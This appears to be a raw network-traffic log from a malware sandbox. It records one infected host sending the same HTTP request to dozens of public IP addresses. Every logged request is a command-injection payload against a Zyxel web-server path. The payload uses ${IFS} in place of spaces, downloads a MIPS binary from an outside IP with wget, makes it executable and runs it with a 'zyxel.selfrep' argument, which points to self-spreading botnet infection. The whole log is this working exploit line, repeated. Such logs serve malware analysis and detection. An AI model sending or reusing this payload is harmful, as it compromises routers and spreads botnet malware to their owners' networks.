                                            Jan 14, 2024 15:50:40.444331884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4773192.168.2.2352214140.217.85.216443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.444391012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4774192.168.2.2359506160.117.132.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.444411039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4775192.168.2.235484882.177.5.25443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.444430113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4776192.168.2.233758279.173.69.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.444483042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4777192.168.2.2348908211.241.246.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.444505930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4778192.168.2.233535212.101.144.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.444550037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4779192.168.2.235447270.116.27.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.444586039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4780192.168.2.2356896158.255.66.115443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.444608927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4781192.168.2.2344510168.137.242.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.444631100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4782192.168.2.2353034175.14.243.206443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.444648981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4783192.168.2.233627263.229.78.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:40.444679976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4784192.168.2.234548299.119.73.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.448014021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4785192.168.2.233852424.189.51.56443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.448127985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4786192.168.2.2345072218.2.243.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.448134899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4787192.168.2.2353536135.204.144.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.448153019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4788192.168.2.2348826218.223.220.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.448189020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4789192.168.2.233424254.98.159.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.448235989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4790192.168.2.234797685.174.234.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.448256016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4791192.168.2.2355818106.221.198.171443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.448286057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4792192.168.2.2353842168.168.246.150443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.448327065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4793192.168.2.235200096.202.158.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.448369026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4794192.168.2.233735480.168.58.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.448405027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4795192.168.2.235624665.76.78.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.448432922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4796192.168.2.2339048204.0.78.6443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.448466063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4797192.168.2.2334662137.201.223.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.448494911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4798192.168.2.2340244152.53.232.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.448558092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4799192.168.2.2358412137.37.189.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.448570013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4800192.168.2.2358968132.162.76.250443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.448627949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4801192.168.2.2341420181.66.197.163443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.448642015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4802192.168.2.2359926156.44.159.204443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.448656082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4803192.168.2.2343308136.13.178.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.448695898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4804192.168.2.2345298216.227.87.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.448729038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4805192.168.2.2338906193.26.33.48443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.448759079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4806192.168.2.2350004112.248.84.116443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.448796988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4807192.168.2.2340024115.220.158.134443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.448837996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4808192.168.2.233951268.98.47.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.448875904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4809192.168.2.2337300109.227.72.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.448896885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4810192.168.2.2350492159.254.131.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.448926926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4811192.168.2.2353732173.139.78.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.448960066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4812192.168.2.235285094.105.178.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.448988914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4813192.168.2.2348106180.134.46.17443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449002981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4814192.168.2.2348418205.53.76.60443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449055910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4815192.168.2.236018039.77.159.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449090958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4816192.168.2.235040646.176.112.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449121952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4817192.168.2.235047037.217.80.1443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449135065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4818192.168.2.235471290.164.117.161443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449158907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4819192.168.2.2349072174.191.231.222443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449214935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4820192.168.2.23601621.163.95.185443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449238062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4821192.168.2.2341562207.43.8.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449279070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4822192.168.2.235440632.139.42.205443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449280024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4823192.168.2.235828072.207.55.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449331045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4824192.168.2.234927662.76.117.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449337006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4825192.168.2.2357066175.154.64.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449371099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4826192.168.2.233820670.64.126.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449402094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4827192.168.2.2342554211.217.52.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449434042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4828192.168.2.2358716102.103.173.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449474096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4829192.168.2.235737438.90.11.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449496984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4830192.168.2.233962662.246.252.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449507952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4831192.168.2.2351376122.181.130.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449547052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4832192.168.2.235933882.85.131.13443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449573994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4833192.168.2.233362243.197.85.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449604988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4834192.168.2.2355560101.178.165.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.449630976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4835192.168.2.2348754197.170.198.40443
                                            TimestampBytes transferredDirectionData
